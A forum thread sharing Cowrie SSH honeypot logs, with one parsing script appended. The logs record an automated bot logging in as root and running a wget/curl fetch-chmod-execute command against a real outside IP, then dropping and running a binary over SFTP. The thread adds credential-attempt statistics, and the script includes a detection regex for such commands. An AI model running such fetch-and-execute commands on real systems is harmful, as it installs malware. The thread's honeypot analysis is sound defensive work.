Interesting SSH honeypot (Cowrie) logs

Started by el-brujo, 17 February 2021, 16:07 PM


el-brujo

Playing with the honeypots I have seen some interesting things, although they are all automated tools and not "real" attacks by people; they are all bots.

But in the log I am posting there is a Chinese IP:
Chinese IP
https://www.elhacker.net/geolocalizacion.html?host=154.223.167.54

It downloaded a binary called 80

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80

ELF binary 80
https://www.virustotal.com/gui/file/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631/detection

gcc.pid ????
https://www.virustotal.com/gui/file/05b08f11a7073248fb29cfedb0ac4d4e050356b83eeaec8d7bbcd9f25b79fdbb

Top 10 most-used commands:

On another machine, quite different results:



I attach the log

2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 154.223.167.54:43236 (192.168.0.7:2222) [session: 1f08d81dd680]
2021-01-28T18:37:58.697484Z [HoneyPotSSHTransport,4,154.223.167.54] Remote SSH version: b'SSH-2.0-PUTTY'
2021-01-28T18:37:58.957221Z [HoneyPotSSHTransport,4,154.223.167.54] SSH client hassh fingerprint: 92674389fa1e47a27ddd8d9b63ecd42b
2021-01-28T18:37:58.962131Z [HoneyPotSSHTransport,4,154.223.167.54] kex alg, key alg: b'diffie-hellman-group14-sha1' b'ssh-rsa'
2021-01-28T18:37:58.962417Z [HoneyPotSSHTransport,4,154.223.167.54] outgoing: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:58.962656Z [HoneyPotSSHTransport,4,154.223.167.54] incoming: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:59.568103Z [HoneyPotSSHTransport,4,154.223.167.54] NEW KEYS
2021-01-28T18:37:59.818998Z [HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-userauth'
2021-01-28T18:38:00.081545Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'none'
2021-01-28T18:38:00.340869Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'password'
2021-01-28T18:38:00.342139Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Could not read etc/userdb.txt, default database activated
2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] login attempt [b'root'/b'mucleus.caca.root'] succeeded
2021-01-28T18:38:00.346823Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Initialized emulated server as architecture: linux-x64-lsb
2021-01-28T18:38:00.348560Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' authenticated with b'password'
2021-01-28T18:38:00.349507Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-connection'
2021-01-28T18:38:00.603490Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:38:00.604767Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:38:00.950026Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://98.159.111.131/80\ncurl -O http://98.159.111.131/80\nchmod +x 80\n./80\n'"
2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80;
2021-01-28T18:39:01.013363Z [-] exitCode: 1
2021-01-28T18:39:01.013920Z [-] sending request b'exit-status'
2021-01-28T18:39:01.015173Z [-] Closing TTY Log: var/lib/cowrie/tty/419a5f3fde27adba89708285693140846f5cf0e98a43290aa5003d8b4a4252d5 after 60 seconds
2021-01-28T18:39:01.015774Z [-] sending close 0
2021-01-28T18:39:01.519587Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:01.520955Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:01.521879Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:01.774363Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] asking for subsystem "b'sftp'"
2021-01-28T18:39:01.775031Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] {b'sftp': <class 'twisted.conch.ssh.filetransfer.FileTransferServer'>}
2021-01-28T18:39:02.500813Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP openFile: b'/bin/eyshcjdmzg'
2021-01-28T18:39:06.584852Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66161 to 64911 in channel 1
2021-01-28T18:39:10.653511Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:14.733271Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:18.811865Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:22.897300Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:26.974574Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:31.093693Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:35.187235Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:39.297588Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631
2021-01-28T18:39:44.136949Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 1
2021-01-28T18:39:44.138294Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:44.139275Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:44.140193Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:44.480978Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'/bin/eyshcjdmzg'"
2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: /bin/eyshcjdmzg
2021-01-28T18:39:44.485118Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command not found: /bin/eyshcjdmzg
2021-01-28T18:39:54.752142Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:54.752851Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:54.754609Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/27bfa685b0774a88946b7b3f3d0f6291bcc8e0ae37769309a8d086593862c0d0 after 10 seconds
2021-01-28T18:39:54.759462Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 2
2021-01-28T18:39:55.004309Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:55.296545Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:55.297591Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:56.293421Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'ls -la /var/run/gcc.pid'"
2021-01-28T18:39:56.295896Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.297632Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command found: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.298644Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:56.298941Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:56.299253Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 3
2021-01-28T18:39:57.974393Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:57.975498Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/e9ca076a73c58dc3b053e9f3e0249b13f1c1b47d23846405096e8c10dc3f7d26 after 1 seconds
2021-01-28T18:39:57.978774Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:57.979388Z [HoneyPotSSHTransport,4,154.223.167.54] Got remote error, code 11 reason: b''
2021-01-28T18:39:57.980313Z [HoneyPotSSHTransport,4,154.223.167.54] avatar root logging out
2021-01-28T18:39:57.980654Z [HoneyPotSSHTransport,4,154.223.167.54] connection lost
2021-01-28T18:39:57.980912Z [HoneyPotSSHTransport,4,154.223.167.54] Connection lost after 119 seconds

On Twitter and on the blog I have published some of the most common password combinations

############
Top 20 COWRIE Usernames for 2021-02-11
############
   3288 b'root'|b'password'
    751 b'admin'|b'password'
    727 b'root'|b'none'
    426 b'admin'|b'none'
    252 b'Admin'|b'password'
    140 b'user'|b'password'
    124 b'Admin'|b'none'
    118 b'ubuntu'|b'password'
     96 b'nproc'|b'password'
     91 b'test'|b'password'
     80 b'postgres'|b'password'
     46 b'nagios'|b'password'
     42 b'oracle'|b'password'
     39 b'guest'|b'password'
     38 b'support'|b'password'
     38 b'Administrator'|b'password'
     30 b'git'|b'password'
     28 b'deploy'|b'password'
     24 b'ftpuser'|b'password'
     22 b'user'|b'none'

On another IP the results are not exactly the same:

And some complete charts (country, etc.)

1- Ireland
2- Russia
3- Panama

688 different IPs in barely 9 hours
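As an added example (not part of the original post, and not Cowrie's own tooling), here is a small Python parser for the Cowrie text log format shown in the thread. It reproduces the "Top N usernames" listing above (which counts username|auth-method pairs from the `trying auth` lines) and, per source IP, collects the hassh fingerprint, successful logins, executed commands and SFTP-dropped files, then flags the two download-and-execute patterns visible in the log: a `wget`/`curl` fetch followed by `chmod +x`, and an SFTP-uploaded file later invoked by name. The sample log lines are constructed to match Cowrie's format and use documentation-range IPs (192.0.2.10, 198.51.100.7, 203.0.113.5) and a zeroed SHA-256, not values from a live system.

```python
"""Summarize Cowrie text log lines: top auth pairs and per-IP session verdicts."""
import re
from collections import Counter, defaultdict

# Constructed sample lines mirroring Cowrie's text log format (not from a live honeypot)
SAMPLE_LOG = """\
2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 192.0.2.10:43236 (192.168.0.7:2222) [session: 1f08d81dd680]
2021-01-28T18:37:58.957221Z [HoneyPotSSHTransport,4,192.0.2.10] SSH client hassh fingerprint: 92674389fa1e47a27ddd8d9b63ecd42b
2021-01-28T18:38:00.081545Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,192.0.2.10] b'root' trying auth b'none'
2021-01-28T18:38:00.340869Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,192.0.2.10] b'root' trying auth b'password'
2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,192.0.2.10] login attempt [b'root'/b'hunter2'] succeeded
2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,192.0.2.10] CMD: #!/bin/sh; wget http://203.0.113.5/80; curl -O http://203.0.113.5/80; chmod +x 80; ./80;
2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,192.0.2.10] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/0000000000000000000000000000000000000000000000000000000000000000
2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,192.0.2.10] CMD: /bin/eyshcjdmzg
2021-01-28T18:40:10.000000Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,5,198.51.100.7] b'admin' trying auth b'password'
2021-01-28T18:40:10.100000Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,5,198.51.100.7] login attempt [b'admin'/b'admin'] failed
2021-01-28T18:40:11.000000Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,5,198.51.100.7] b'root' trying auth b'password'
2021-01-28T18:40:11.100000Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,5,198.51.100.7] login attempt [b'root'/b'123456'] failed
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) \[(?P<ctx>[^\]]*)\] (?P<msg>.*)$")
SRC_RE = re.compile(r"HoneyPotSSHTransport,\d+,(?P<ip>[0-9a-fA-F.:]+)")
NEWCONN_RE = re.compile(r"New connection: (?P<ip>[0-9a-fA-F.:]+):\d+")
TRYAUTH_RE = re.compile(r"b'(?P<user>[^']*)' trying auth b'(?P<method>[^']*)'")
LOGIN_RE = re.compile(r"login attempt \[b'(?P<user>[^']*)'/b'(?P<pw>[^']*)'\] (?P<result>succeeded|failed)")
UPLOAD_RE = re.compile(r'SFTP Uploaded file "(?P<name>[^"]*)" to (?P<path>\S+)')
CMD_RE = re.compile(r"CMD: (?P<cmd>.*)")
HASSH_RE = re.compile(r"SSH client hassh fingerprint: (?P<hassh>[0-9a-f]+)")
# fetch-then-mark-executable, the first pattern in the thread's log
FETCH_RE = re.compile(r"\b(wget|curl)\b.*?\bchmod \+x\b", re.S)


def parse_cowrie_log(text):
    """Turn raw log lines into typed events, each tagged with the source IP."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ctx, msg = m.group("ts", "ctx", "msg")
        src = SRC_RE.search(ctx) or NEWCONN_RE.search(msg)
        ev = {"ts": ts, "ip": src.group("ip") if src else None}
        if (a := TRYAUTH_RE.search(msg)):
            ev.update(type="try_auth", user=a["user"], method=a["method"])
        elif (a := LOGIN_RE.search(msg)):
            ev.update(type="login", user=a["user"], password=a["pw"], result=a["result"])
        elif (a := UPLOAD_RE.search(msg)):
            # Cowrie stores dropped files under their SHA-256, which is the basename
            ev.update(type="upload", name=a["name"], sha256=a["path"].rsplit("/", 1)[-1])
        elif (a := CMD_RE.search(msg)):
            ev.update(type="cmd", cmd=a["cmd"])
        elif (a := HASSH_RE.search(msg)):
            ev.update(type="hassh", hassh=a["hassh"])
        else:
            continue  # connection bookkeeping lines carry nothing we summarize
        events.append(ev)
    return events


def top_auth_pairs(events, n=20):
    """Same shape as the post's 'Top 20' listing: count b'user'|b'method' from 'trying auth' lines."""
    counts = Counter(f"b'{e['user']}'|b'{e['method']}'" for e in events if e["type"] == "try_auth")
    return counts.most_common(n)


def flag_sessions(events):
    """Per source IP: fingerprint, successful logins, commands, dropped files and a download-and-execute verdict."""
    by_ip = defaultdict(lambda: {"hassh": None, "logins": [], "commands": [], "uploads": []})
    for e in events:
        if e["ip"] is None:
            continue
        s = by_ip[e["ip"]]
        if e["type"] == "hassh":
            s["hassh"] = e["hassh"]
        elif e["type"] == "login" and e["result"] == "succeeded":
            s["logins"].append((e["user"], e["password"]))
        elif e["type"] == "cmd":
            s["commands"].append(e["cmd"])
        elif e["type"] == "upload":
            s["uploads"].append((e["name"], e["sha256"]))
    for s in by_ip.values():
        fetch_exec = any(FETCH_RE.search(c) for c in s["commands"])
        # second pattern in the thread's log: an SFTP-dropped file invoked by name afterwards
        dropped_exec = any(name in c for name, _ in s["uploads"] for c in s["commands"])
        s["download_and_execute"] = fetch_exec or dropped_exec
    return dict(by_ip)


if __name__ == "__main__":
    evs = parse_cowrie_log(SAMPLE_LOG)
    for pair, count in top_auth_pairs(evs):
        print(f"{count:7d} {pair}")
    for ip, s in flag_sessions(evs).items():
        print(ip, "hassh=", s["hassh"], "download_and_execute=", s["download_and_execute"],
              "uploads=", s["uploads"])
```

Point the script at a real `cowrie.log` by reading the file into `parse_cowrie_log` instead of `SAMPLE_LOG`; the hassh value is worth keeping alongside the IP, since the same client fingerprint tends to reappear across many source addresses when the activity is a bot, as the post observes.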